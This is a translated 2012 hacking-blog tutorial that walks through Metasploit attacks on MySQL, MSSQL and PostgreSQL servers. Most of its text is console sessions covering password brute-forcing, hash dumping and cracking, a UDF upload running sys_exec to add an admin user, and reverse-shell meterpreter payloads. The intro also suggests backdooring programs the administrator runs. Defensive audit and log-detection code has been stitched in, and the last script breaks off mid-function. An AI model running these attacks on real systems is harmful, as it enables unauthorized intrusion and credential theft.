14 Metasploit privilege escalation
Posted on 2012-8-6 10:39:45

Honestly, this piece would be better retitled "Database attacks in a Windows environment"......

Preface

  Intrusions are getting harder and harder these days; people's security awareness has generally improved quite a bit. Even home users know to have a firewall and antivirus software installed, and Microsoft patch updates are no longer ignored. So scanning the Internet for weak-password hosts has become almost a pipe dream. (Which is a very good thing.)

  But this also makes intrusion testing unprecedentedly difficult for us hackers. Through various means we usually cannot directly obtain a system's administrator privileges. For example, through certain attacks on IIS we only get the privileges of IUSR_MACHINENAME (uploading an ASP trojan, certain overflows, and so on). That account usually has only the system's default guest-level privileges, so how to get administrator or SYSTEM privileges has become ever more important.

  So I have summarized several privilege-escalation methods that people commonly use. The content below is what I collected; there is nothing new in it, and it is written for newbies like me. Experts can skip it; of course, if you want to review it I have no objection, and while you're at it help me check what is missing.
Right, it's mainly about databases.
If the target has no service you can exploit, you can also replace a program the target's administrator uses regularly, such as QQ or MSN; the replacement method is the same as replacing a service, it's just that when your backdoor actually gets started depends on your luck.
There are also external devices, not covered....
And changing startup items, not covered either
Lots and lots more, too lazy to write it all..

MySQL database

First you have to enable remote connections (Windows):

  GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'your_password' WITH GRANT OPTION;
Now attack: scan a host
  msf > use auxiliary/scanner/mysql/mysql_login
  msf  auxiliary(mysql_login) > set RHOSTS 5.5.5.3
  RHOSTS => 5.5.5.3
  msf  auxiliary(mysql_login) > set USERNAME root
  USERNAME => root
  msf  auxiliary(mysql_login) > set PASS_FILE /pen/msf3/data/wordlists/postgres_default_pass.txt
  PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt
  msf  auxiliary(mysql_login) > exploit
  [*] 5.5.5.3:3306 MYSQL - Found remote MySQL version 5.5.16
  [*] 5.5.5.3:3306 MYSQL - [1/7] - Trying username:'root' with password:''
  [*] 5.5.5.3:3306 MYSQL - [1/7] - failed to login as 'root' with password ''
  [*] 5.5.5.3:3306 MYSQL - [2/7] - Trying username:'root' with password:'root'
  [*] 5.5.5.3:3306 MYSQL - [2/7] - failed to login as 'root' with password 'root'
  [*] 5.5.5.3:3306 MYSQL - [3/7] - Trying username:'root' with password:'tiger'
  [*] 5.5.5.3:3306 MYSQL - [3/7] - failed to login as 'root' with password 'tiger'
  [*] 5.5.5.3:3306 MYSQL - [4/7] - Trying username:'root' with password:'postgres'
  [*] 5.5.5.3:3306 MYSQL - [4/7] - failed to login as 'root' with password 'postgres'
  [*] 5.5.5.3:3306 MYSQL - [5/7] - Trying username:'root' with password:'password'
  [*] 5.5.5.3:3306 MYSQL - [5/7] - failed to login as 'root' with password 'password'
  [*] 5.5.5.3:3306 MYSQL - [6/7] - Trying username:'root' with password:'admin'
  [*] 5.5.5.3:3306 MYSQL - [6/7] - failed to login as 'root' with password 'admin'
  [*] 5.5.5.3:3306 MYSQL - [7/7] - Trying username:'root' with password:'123456'
  [+] 5.5.5.3:3306 - SUCCESSFUL LOGIN 'root' : '123456'
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
View the results:
  msf  auxiliary(mysql_login) > creds

  Credentials
  ===========

  host     port  user  pass    type      active?
  ----     ----  ----  ----    ----      -------
  5.5.5.3  3306  root  123456  password  true

  [*] Found 1 credential.
  msf  auxiliary(mysql_login) >
Enumerate information
  msf  exploit(ms10_018_ie_behaviors) > use auxiliary/admin/mysql/mysql_enum
  msf  auxiliary(mysql_enum) > show options

  Module options (auxiliary/admin/mysql/mysql_enum):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     PASSWORD                   no        The password for the specified username
     RHOST                      yes       The target address
     RPORT     3306             yes       The target port
     USERNAME                   no        The username to authenticate as

  msf  auxiliary(mysql_enum) > set PASSWORD 123456
  PASSWORD => 123456
  msf  auxiliary(mysql_enum) > set USERNAME root
  USERNAME => root
  msf  auxiliary(mysql_enum) > set RHOST 5.5.5.3
  RHOST => 5.5.5.3
  msf  auxiliary(mysql_enum) > exploit

  [*] Running MySQL Enumerator...
  [*] Enumerating Parameters
  [*]         MySQL Version: 5.5.16
  [*]         Compiled for the following OS: Win32
  [*]         Architecture: x86
  [*]         Server Hostname: dis9team-a1
  [*]         Data Directory: C:\xampp\mysql\data\
  [*]         Logging of queries and logins: OFF
  [*]         Old Password Hashing Algorithm OFF
  [*]         Loading of local files: ON
  [*]         Logins with old Pre-4.1 Passwords: OFF
  [*]         Allow Use of symlinks for Database Files: YES
  [*]         Allow Table Merge:
  [*]         SSL Connection: DISABLED
  [*] Enumerating Accounts:
  [*]         List of Accounts with Password Hashes:
  [*]                 User: root Host: localhost Password Hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
  [*]                 User: root Host: 127.0.0.1 Password Hash:
  [*]                 User:  Host: localhost Password Hash:
  [*]                 User: pma Host: localhost Password Hash:
  [*]                 User: root Host: % Password Hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
  [*]         The following users have GRANT Privilege:
  [*]                 User: root Host: localhost
  [*]                 User: root Host: 127.0.0.1
  [*]                 User: root Host: %
  [*]         The following users have CREATE USER Privilege:
  [*]                 User: root Host: localhost
  [*]                 User: root Host: 127.0.0.1
  [*]                 User: root Host: %
  [*]         The following users have RELOAD Privilege:
  [*]                 User: root Host: localhost
  [*]                 User: root Host: 127.0.0.1
  [*]                 User: root Host: %
  [*]         The following users have SHUTDOWN Privilege:
  [*]                 User: root Host: localhost
  [*]                 User: root Host: 127.0.0.1
  [*]                 User: root Host: %
  [*]         The following users have SUPER Privilege:
  [*]                 User: root Host: localhost
  [*]                 User: root Host: 127.0.0.1
  [*]                 User: root Host: %
  [*]         The following users have FILE Privilege:
  [*]                 User: root Host: localhost
  [*]                 User: root Host: 127.0.0.1
  [*]                 User: root Host: %
  [*]         The following users have PROCESS Privilege:
  [*]                 User: root Host: localhost
  [*]                 User: root Host: 127.0.0.1
  [*]                 User: root Host: %
  [*]         The following accounts have privileges to the mysql database:
  [*]                 User: root Host: localhost
  [*]                 User: root Host: 127.0.0.1
  [*]                 User: root Host: %
  [*]         Anonymous Accounts are Present:
  [*]                 User:  Host: localhost
  [*]         The following accounts have empty passwords:
  [*]                 User: root Host: 127.0.0.1
  [*]                 User:  Host: localhost
  [*]                 User: pma Host: localhost
  [*]         The following accounts are not restricted by source:
  [*]                 User: root Host: %
  [*] Auxiliary module execution completed
  msf  auxiliary(mysql_enum) >
Execute a SQL statement
  msf  auxiliary(mysql_enum) > use auxiliary/admin/mysql/mysql_sql
  msf  auxiliary(mysql_sql) > show options

  Module options (auxiliary/admin/mysql/mysql_sql):

     Name      Current Setting   Required  Description
     ----      ---------------   --------  -----------
     PASSWORD                    no        The password for the specified username
     RHOST                       yes       The target address
     RPORT     3306              yes       The target port
     SQL       select version()  yes       The SQL to execute.
     USERNAME                    no        The username to authenticate as

  msf  auxiliary(mysql_sql) > set PASSWORD 123456
  PASSWORD => 123456
  msf  auxiliary(mysql_sql) > set RHOST 5.5.5.3
  RHOST => 5.5.5.3
  msf  auxiliary(mysql_sql) > set USERNAME root
  USERNAME => root
  msf  auxiliary(mysql_sql) > exploit

  [*] Sending statement: 'select version()'...
  [*]  | 5.5.16 |
  [*] Auxiliary module execution completed
  msf  auxiliary(mysql_sql) >
Dump the hashes
  msf  auxiliary(mysql_sql) > use auxiliary/scanner/mysql/mysql_hashdump
  msf  auxiliary(mysql_hashdump) > show options

  Module options (auxiliary/scanner/mysql/mysql_hashdump):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     PASSWORD                   no        The password for the specified username
     RHOSTS                     yes       The target address range or CIDR identifier
     RPORT     3306             yes       The target port
     THREADS   1                yes       The number of concurrent threads
     USERNAME                   no        The username to authenticate as

  msf  auxiliary(mysql_hashdump) > set PASSWORD 123456
  PASSWORD => 123456
  msf  auxiliary(mysql_hashdump) > set USERNAME root
  USERNAME => root
  msf  auxiliary(mysql_hashdump) > set RHOSTS 5.5.5.3
  RHOSTS => 5.5.5.3
  msf  auxiliary(mysql_hashdump) > exploit

  [+] Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
  [+] Saving HashString as Loot: root:
  [+] Saving HashString as Loot: :
  [+] Saving HashString as Loot: pma:
  [+] Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
  [+] Saving HashString as Loot: dis9team:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
  [*] Hash Table has been saved: /home/brk/.msf4/loot/20120312075809_default_5.5.5.3_mysql.hashes_864135.txt
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
  msf  auxiliary(mysql_hashdump) >
Cracking the hashes: first look at the loot information. Without a dump there is no way to crack, so the hashes must be exported first. The tool is a precompiled John the Ripper.
  msf  auxiliary(mysql_hashdump) > loot

  Loot
  ====

  host     service  type          name                          content     info          path
  ----     -------  ----          ----                          -------     ----          ----
  5.5.5.3  mysql    mysql.hashes  5.5.5.3-3306_mysqlhashes.txt  text/plain  MySQL Hashes  /home/brk/.msf4/loot/20120312075903_default_5.5.5.3_mysql.hashes_213052.txt

  msf  auxiliary(mysql_hashdump) >
Got it, now crack it directly
  msf  auxiliary(mysql_hashdump) > use auxiliary/analyze/jtr_mysql_fast
  msf  auxiliary(jtr_mysql_fast) > exploit

  [*] HashList: /tmp/jtrtmp20120312-29370-1ra46p8
  [*] Trying 'mysql-fast' Wordlist: /tmp/jtrtmp20120312-29370-ojc089
  [*] Output: No password hashes loaded (see FAQ)
  [*] Trying 'mysql-fast' Rule: All4...
  [*] Output: No password hashes loaded (see FAQ)
  [*] Trying mysql-fast Rule: Digits5...
  [*] Output: No password hashes loaded (see FAQ)
  [*] 0 password hashes cracked, 0 left

  [*] 0 hashes were cracked!
  [*] Trying 'mysql-sha1' Wordlist: /tmp/jtrtmp20120312-29370-ojc089
  guesses: 1  time: 0:00:00:00 DONE (Mon Mar 12 07:59:31 2012)  c/s: 480  trying: 123321 - 123456
  Warning: passwords printed above might not be all those cracked
  Use the "--show" option to display all of the cracked passwords reliably
  [*] Output: Loaded 1 password hash (MySQL 4.1 double-SHA-1 [mysql-sha1 SSE2])
  [*] Output: 123456           (root)
  [*] Trying 'mysql-sha1' Rule: All4...
  [*] Output: Loaded 1 password hash (MySQL 4.1 double-SHA-1 [mysql-sha1 SSE2])
  [*] Output: No password hashes left to crack (see FAQ)
  [*] Trying 'mysql-sha1' Rule: Digits5...
  [*] Output: Loaded 1 password hash (MySQL 4.1 double-SHA-1 [mysql-sha1 SSE2])
  [*] Output: No password hashes left to crack (see FAQ)
  [*] root:123456:5.5.5.3:3306

  [*] root:123456:5.5.5.3:3306

  [*] dis9team:123456:5.5.5.3:3306

  [*]

  [*] 3 password hashes cracked, 0 left

  [*] 3 hashes were cracked!
  [+] Host: 5.5.5.3 Port: 3306 User: root Pass: 123456
  [+] Host: 5.5.5.3 Port: 3306 User: dis9team Pass: 123456
  [*] Auxiliary module execution completed
  msf  auxiliary(jtr_mysql_fast) >
Plaintext credentials recorded in the database
  msf  auxiliary(jtr_mysql_fast) > creds

  Credentials
  ===========

  host     port  user      pass    type      active?
  ----     ----  ----      ----    ----      -------
  5.5.5.3  3306  root      123456  password  true
  5.5.5.3  3306  dis9team  123456  password  true

  [*] Found 2 credentials.
  msf  auxiliary(jtr_mysql_fast) >
Privilege escalation
  msf  auxiliary(mysql_login) > use exploit/windows/mysql/mysql_payload
  msf  exploit(mysql_payload) > set RHOST 5.5.5.3
  RHOST => 5.5.5.3
  msf  exploit(mysql_payload) > show options

  Module options (exploit/windows/mysql/mysql_payload):

     Name              Current Setting  Required  Description
     ----              ---------------  --------  -----------
     FORCE_UDF_UPLOAD  false            no        Always attempt to install a sys_exec() mysql.function.
     PASSWORD                           no        The password for the specified username
     RHOST             5.5.5.3          yes       The target address
     RPORT             3306             yes       The target port
     USERNAME          root             no        The username to authenticate as

  Payload options (windows/meterpreter/reverse_tcp):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     EXITFUNC  process          yes       Exit technique: seh, thread, process, none
     LHOST     5.5.5.1          yes       The listen address
     LPORT     4444             yes       The listen port

  Exploit target:

     Id  Name
     --  ----
     0   Automatic

  msf  exploit(mysql_payload) > set PASSWORD 123456
  PASSWORD => 123456
  msf  exploit(mysql_payload) > exploit
  [*] Started reverse handler on 5.5.5.1:4444
  [*] Checking target architecture...
  [*] Checking for sys_exec()...
  [*] Checking target architecture...
  [*] Checking for MySQL plugin directory...
  [*] Target arch (win32) and target path both okay.
  [*] Uploading lib_mysqludf_sys_32.dll library to C:/xampp/mysql/lib/plugin/CHlQoqQu.dll...
  [*] Checking for sys_exec()...
  [*] Command Stager progress -   1.47% done (1499/102246 bytes)
  [*] Command Stager progress -   2.93% done (2998/102246 bytes)
  [*] Command Stager progress - 100.00% done (102246/102246 bytes)
  msf  exploit(mysql_payload) > sessions

  Active sessions
  ===============

  No active sessions.

  msf  exploit(mysql_payload) >
Huh? Why is there no response? Actually it has already succeeded =.= Connect to the database remotely and execute:
  SELECT sys_exec('net user admin /add');
The user has in fact already been added.
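As a defensive counterpart to the mysql_enum, mysql_hashdump, jtr_mysql_fast and mysql_payload steps above, the Python below (an added example for this page, not the original post's or Metasploit's code) audits a mysql.user snapshot and a few server variables for what those steps relied on: anonymous and empty-password accounts, root reachable from '%', weak passwords matched through the unsalted mysql_native_password double-SHA1, the FILE privilege on a remote account, and an empty secure_file_priv. The account rows, variable values and WEAK_PASSWORDS list are constructed to mirror the enum output, and the remediation statements are emitted for review, not executed.

```python
import hashlib

LOCAL_HOSTS = ("localhost", "127.0.0.1", "::1")


def mysql_native_hash(password: str) -> str:
    """mysql_native_password (MySQL 4.1+) scheme: '*' + SHA1(SHA1(password)) as uppercase hex.
    There is no salt, so equal passwords give equal hashes and a wordlist check costs two
    SHA1 calls per candidate (which is why jtr_mysql_fast above got '123456' instantly)."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


# Constructed snapshot of: SELECT User, Host, Password, File_priv FROM mysql.user
# (rows mirror the enum output above; the hash shown is the real one for '123456')
ACCOUNTS = [
    {"user": "root", "host": "localhost", "hash": "*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9", "file": "Y"},
    {"user": "root", "host": "127.0.0.1", "hash": "", "file": "Y"},
    {"user": "", "host": "localhost", "hash": "", "file": "N"},
    {"user": "pma", "host": "localhost", "hash": "", "file": "N"},
    {"user": "root", "host": "%", "hash": "*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9", "file": "Y"},
]
# Constructed subset of SHOW VARIABLES, matching "Loading of local files: ON"
VARIABLES = {"local_infile": "ON", "secure_file_priv": "", "plugin_dir": "C:/xampp/mysql/lib/plugin/"}
# Constructed weak-password list (a real audit would use a much larger one)
WEAK_PASSWORDS = ["", "root", "password", "admin", "123456"]


def audit(accounts, variables, weak_passwords):
    """Return (findings, fixes): human-readable issues and suggested SQL / config changes."""
    findings, fixes = [], []
    weak = {mysql_native_hash(p): p for p in weak_passwords if p}  # hash -> plaintext
    for a in accounts:
        acct = f"'{a['user']}'@'{a['host']}'"
        drop = False
        if a["user"] == "":
            findings.append(f"anonymous account {acct}")
            drop = True
        if a["host"] == "%":
            findings.append(f"{acct} is reachable from any host")
            drop = drop or a["user"] == "root"  # remote root is what mysql_login guessed above
        if a["hash"] == "":
            findings.append(f"empty password on {acct}")
        elif a["hash"] in weak:
            findings.append(f"weak password '{weak[a['hash']]}' on {acct}")
        if a["file"] == "Y" and a["host"] not in LOCAL_HOSTS:
            findings.append(f"FILE privilege on remote account {acct} "
                            "(SELECT ... INTO DUMPFILE can drop a UDF library into plugin_dir)")
        if drop:
            fixes.append(f"DROP USER {acct};")
        elif a["hash"] == "" or a["hash"] in weak:
            fixes.append(f"SET PASSWORD FOR {acct} = PASSWORD('<new strong password>');")
    if variables.get("secure_file_priv", "") == "":
        findings.append("secure_file_priv is empty: file writes are not confined to one directory")
        fixes.append("-- my.ini / my.cnf: secure_file_priv = <dedicated export directory>")
    if variables.get("local_infile", "OFF").upper() == "ON":
        findings.append("local_infile is ON (LOAD DATA LOCAL can read client-side files)")
        fixes.append("SET GLOBAL local_infile = 0;")
    return findings, fixes


def run_sample():
    """Audit the constructed snapshot; returns (findings, fixes)."""
    return audit(ACCOUNTS, VARIABLES, WEAK_PASSWORDS)


if __name__ == "__main__":
    found, todo = run_sample()
    print("\n".join(found))
    print("\n".join(todo))
```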
MSSQL database: view the login/cracking module info
  msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
  msf auxiliary(mssql_login) > info

         Name: MSSQL Login Utility
      Version: 7185
      License: Metasploit Framework License (BSD)

  Provided by:
    MC

  Basic options:
    Name             Current Setting                                        Required  Description
    ----             ---------------                                        --------  -----------
    HEX2BINARY       /home/carlos/framework3/trunk/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
    MSSQL_PASS                                                              no        The password for the specified username
    MSSQL_PASS_FILE                                                         no        A dictionary of passwords to perform a bruteforce attempt
    MSSQL_USER       sa                                                     no        The username to authenticate as
    RHOSTS                                                                  yes       The target address range or CIDR identifier
    RPORT            1433                                                   yes       The target port
    THREADS          1                                                      yes       The number of concurrent threads

  Description:
    This module simply queries the MSSQL instance for a specific
    user/pass (default is sa with blank).
Set a password dictionary and crack
  msf auxiliary(mssql_login) > set MSSQL_USER meta
  MSSQL_USER => meta
  msf auxiliary(mssql_login) > set MSSQL_PASS_FILE /tmp/dict.txt
  MSSQL_PASS_FILE => /tmp/dict.txt
  msf auxiliary(mssql_login) > set RHOSTS 192.168.1.156
  RHOSTS => 192.168.1.156
  msf auxiliary(mssql_login) > run

  [*] 192.168.1.156:1433 successful logged in as 'meta' with password 'meta'
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
  msf auxiliary(mssql_login) >
View MSSQL functions (enumeration)

  msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_enum
  msf auxiliary(mssql_enum) > set MSSQL_USER meta
  MSSQL_USER => meta
  msf auxiliary(mssql_enum) > set MSSQL_PASS meta
  MSSQL_USER => meta
  msf auxiliary(mssql_enum) > set RHOST 192.168.1.156
  RHOST => 192.168.1.156
  msf auxiliary(mssql_enum) > run

  [*] Running MS SQL Server Enumeration...
  [*] Auxiliary module execution completed
  msf auxiliary(mssql_enum) > set MSSQL_PASS meta
  MSSQL_PASS => meta
  msf auxiliary(mssql_enum) > run

  [*] Running MS SQL Server Enumeration...
  [*] Version:
  [*]     Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86)
  [*]             Jul  9 2008 14:43:34
  [*]             Copyright (c) 1988-2008 Microsoft Corporation
  [*]             Enterprise Edition on Windows NT 5.2  (Build 3790: Service Pack 2)
  [*] Configuration Parameters:
  [*]     C2 Audit Mode is Not Enabled
  [*]     xp_cmdshell is Enabled
  [*]     remote access is Enabled
  [*]     allow updates is Not Enabled
  [*]     Database Mail XPs is Not Enabled
  [*]     Ole Automation Procedures are Not Enabled
  [*] Databases on the server:
  [*]     Database name:master
  [*]     Databse Files for master:
  [*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\master.mdf
  [*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\mastlog.ldf
  [*]     Database name:tempdb
  [*]     Databse Files for tempdb:
  [*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\tempdb.mdf
  [*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\templog.ldf
  [*]     Database name:model
  [*]     Databse Files for model:
  [*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\model.mdf
  [*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\modellog.ldf
  [*]     Database name:msdb
  [*]     Databse Files for msdb:
  [*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf
  [*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBLog.ldf
  [*] System Logins on this Server:
  [*]     sa
  [*]     ##MS_SQLResourceSigningCertificate##
  [*]     ##MS_SQLReplicationSigningCertificate##
  [*]     ##MS_SQLAuthenticatorCertificate##
  [*]     ##MS_PolicySigningCertificate##
  [*]     ##MS_PolicyEventProcessingLogin##
  [*]     ##MS_PolicyTsqlExecutionLogin##
  [*]     ##MS_AgentSigningCertificate##
  [*]     NT AUTHORITY\SYSTEM
  [*]     NT AUTHORITY\NETWORK SERVICE
  [*]     DBSQL2K801\Administrator
  [*]     dangerlogin
  [*]     meta
  [*] Disabled Accounts:
  [*]     sa
  [*]     ##MS_PolicyEventProcessingLogin##
  [*]     ##MS_PolicyTsqlExecutionLogin##
  [*] No Accounts Policy is set for:
  [*]     dangerlogin
  [*]     meta
  [*] Password Expiration is not checked for:
  [*]     sa
  [*]     ##MS_PolicyEventProcessingLogin##
  [*]     ##MS_PolicyTsqlExecutionLogin##
  [*]     dangerlogin
  [*]     meta
  [*] System Admin Logins on this Server:
  [*]     sa
  [*]     NT AUTHORITY\SYSTEM
  [*]     NT AUTHORITY\NETWORK SERVICE
  [*]     DBSQL2K801\Administrator
  [*]     meta
  [*] Windows Logins on this Server:
  [*]     NT AUTHORITY\SYSTEM
  [*]     NT AUTHORITY\NETWORK SERVICE
  [*]     DBSQL2K801\Administrator
  [*] Windows Groups that can logins on this Server:
  [*]     No Windows Groups where found with permission to login to system.
  [*] Accounts with Username and Password being the same:
  [*]     meta
  [*] Accounts with empty password:
  [*]     No Accounts with empty passwords where found.
  [*] Stored Procedures with Public Execute Permission found:
  [*]     sp_replsetsyncstatus
  [*]     sp_replcounters
  [*]     sp_replsendtoqueue
  [*]     sp_resyncexecutesql
  [*]     sp_prepexecrpc
  [*]     sp_repltrans
  [*]     sp_xml_preparedocument
  [*]     xp_qv
  [*]     xp_getnetname
  [*]     sp_releaseschemalock
  [*]     sp_refreshview
  [*]     sp_replcmds
  [*]     sp_unprepare
  [*]     sp_resyncprepare
  [*]     sp_createorphan
  [*]     xp_dirtree
  [*]     sp_replwritetovarbin
  [*]     sp_replsetoriginator
  [*]     sp_xml_removedocument
  [*]     sp_repldone
  [*]     sp_reset_connection
  [*]     xp_fileexist
  [*]     xp_fixeddrives
  [*]     sp_getschemalock
  [*]     sp_prepexec
  [*]     xp_revokelogin
  [*]     sp_resyncuniquetable
  [*]     sp_replflush
  [*]     sp_resyncexecute
  [*]     xp_grantlogin
  [*]     sp_droporphans
  [*]     xp_regread
  [*]     sp_getbindtoken
  [*]     sp_replincrementlsn
  [*] Instances found on this server:
  [*]     MSSQLSERVER
  [*]     TESTINST
  [*] Default Server Instance SQL Server Service is running under the privilege of:
  [*]     NT AUTHORITY\NETWORK SERVICE
  [*] Instance TESTINST SQL Server Service is running under the privilage of:
  [*]     LocalSystem
  [*] Auxiliary module execution completed
  msf auxiliary(mssql_enum) >
Gain access
  msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf exploit(mssql_payload) > set LHOST 192.168.1.158
  LHOST => 192.168.1.158
  msf exploit(mssql_payload) > set RHOST 92.168.1.156
  RHOST => 92.168.1.156
  msf exploit(mssql_payload) > set MSSQL_USER meta
  MSSQL_USER => meta
  msf exploit(mssql_payload) > set MSSQL_PASS meta
  MSSQL_PASS => meta
  msf exploit(mssql_payload) > exploit
  msf exploit(mssql_payload) > exploit

  [*] Started reverse handler on port 4444
  [*] Warning: This module will leave fGDpiveA.exe in the SQL Server %TEMP% directory
  [*] Writing the debug.com loader to the disk...
  [*] Converting the debug script to an executable...
  [*] Uploading the payload, please be patient...
  [*] Converting the encoded payload...
  [*] Executing the payload...
  [*] Sending stage (719360 bytes)
  [*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.156:1708)

  meterpreter > sysinfo
PostgreSQL: brute-force a host

  msf > use auxiliary/scanner/postgres/postgres_login
  msf  auxiliary(postgres_login) >
The dictionary and the rest are already set up; you can keep the defaults or change them yourself. I just ran it; all my passwords are 123456 =.=
  msf  auxiliary(postgres_login) > exploit

  [*] 5.5.5.3:5432 Postgres - [01/14] - Trying username:'postgres' with password:'' on database 'template1'
  [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'postgres':''
  [-] 5.5.5.3:5432 Postgres - [01/14] - Username/Password failed.
  [*] 5.5.5.3:5432 Postgres - [02/14] - Trying username:'' with password:'' on database 'template1'
  [-] 5.5.5.3:5432 Postgres - Invalid username or password: '':''
  [-] 5.5.5.3:5432 Postgres - [02/14] - Username/Password failed.
  [*] 5.5.5.3:5432 Postgres - [03/14] - Trying username:'scott' with password:'' on database 'template1'
  [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'scott':''
  [-] 5.5.5.3:5432 Postgres - [03/14] - Username/Password failed.
  [*] 5.5.5.3:5432 Postgres - [04/14] - Trying username:'admin' with password:'' on database 'template1'
  [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'admin':''
  [-] 5.5.5.3:5432 Postgres - [04/14] - Username/Password failed.
  [*] 5.5.5.3:5432 Postgres - [05/14] - Trying username:'postgres' with password:'postgres' on database 'template1'
  [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'postgres':'postgres'
  [-] 5.5.5.3:5432 Postgres - [05/14] - Username/Password failed.
  [*] 5.5.5.3:5432 Postgres - [06/14] - Trying username:'scott' with password:'scott' on database 'template1'
  [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'scott':'scott'
  [-] 5.5.5.3:5432 Postgres - [06/14] - Username/Password failed.
  [*] 5.5.5.3:5432 Postgres - [07/14] - Trying username:'admin' with password:'admin' on database 'template1'
  [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'admin':'admin'
  [-] 5.5.5.3:5432 Postgres - [07/14] - Username/Password failed.
  [*] 5.5.5.3:5432 Postgres - [08/14] - Trying username:'postgres' with password:'password' on database 'template1'
  [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'postgres':'password'
  [-] 5.5.5.3:5432 Postgres - [08/14] - Username/Password failed.
  [*] 5.5.5.3:5432 Postgres - [09/14] - Trying username:'postgres' with password:'admin' on database 'template1'
  [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'postgres':'admin'
  [-] 5.5.5.3:5432 Postgres - [09/14] - Username/Password failed.
  [*] 5.5.5.3:5432 Postgres - [10/14] - Trying username:'admin' with password:'password' on database 'template1'
  [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'admin':'password'
  [-] 5.5.5.3:5432 Postgres - [10/14] - Username/Password failed.
  [*] 5.5.5.3:5432 Postgres - [11/14] - Trying username:'postgres' with password:'123456' on database 'template1'
  [+] 5.5.5.3:5432 Postgres - Logged in to 'template1' with 'postgres':'123456'
  [+] 5.5.5.3:5432 Postgres - Success: postgres:123456 (Database 'template1' succeeded.)
  [*] 5.5.5.3:5432 Postgres - Disconnected
  [*] 5.5.5.3:5432 Postgres - [12/14] - Trying username:'' with password:'123456' on database 'template1'
  [-] 5.5.5.3:5432 Postgres - Invalid username or password: '':'123456'
  [-] 5.5.5.3:5432 Postgres - [12/14] - Username/Password failed.
  [*] 5.5.5.3:5432 Postgres - [13/14] - Trying username:'scott' with password:'123456' on database 'template1'
  [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'scott':'123456'
  [-] 5.5.5.3:5432 Postgres - [13/14] - Username/Password failed.
  [*] 5.5.5.3:5432 Postgres - [14/14] - Trying username:'admin' with password:'123456' on database 'template1'
  [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'admin':'123456'
  [-] 5.5.5.3:5432 Postgres - [14/14] - Username/Password failed.
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
  msf  auxiliary(postgres_login) >
One success, and of course the password is 123456.
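The defender's view of the login scan above, as an added example that is not part of the original post: a small detector run over PostgreSQL server log lines that flags a client producing a burst of failed logins across several usernames, and notes whether a login from that client succeeded right afterwards. It assumes the server logs with log_line_prefix = '%t [%p] %h ' and log_connections = on; the log excerpt is constructed to mirror the scanner run.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed PostgreSQL log excerpt (assumes log_line_prefix = '%t [%p] %h '
# and log_connections = on). It mirrors the scanner run above: one client
# cycles through several usernames within seconds, then one attempt succeeds.
SAMPLE_LOG = """\
2012-03-12 07:03:20 CST [1224] 5.5.5.1 FATAL:  password authentication failed for user "postgres"
2012-03-12 07:03:20 CST [1225] 5.5.5.1 FATAL:  password authentication failed for user "admin"
2012-03-12 07:03:21 CST [1226] 5.5.5.1 FATAL:  password authentication failed for user "scott"
2012-03-12 07:03:22 CST [1227] 5.5.5.1 FATAL:  password authentication failed for user "postgres"
2012-03-12 07:03:23 CST [1228] 5.5.5.1 FATAL:  password authentication failed for user "admin"
2012-03-12 07:03:24 CST [1229] 5.5.5.1 FATAL:  password authentication failed for user "postgres"
2012-03-12 07:03:26 CST [1236] 5.5.5.1 LOG:  connection authorized: user=postgres database=template1
2012-03-12 07:05:00 CST [1300] 5.5.5.7 FATAL:  password authentication failed for user "app"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \S+ \[\d+\] (?P<host>\S+) '
    r'(?P<level>FATAL|LOG):\s+(?P<msg>.*)$')
FAIL_MARK = 'password authentication failed for user "'
OK_MARK = 'connection authorized: user='


def parse_auth_events(log_text):
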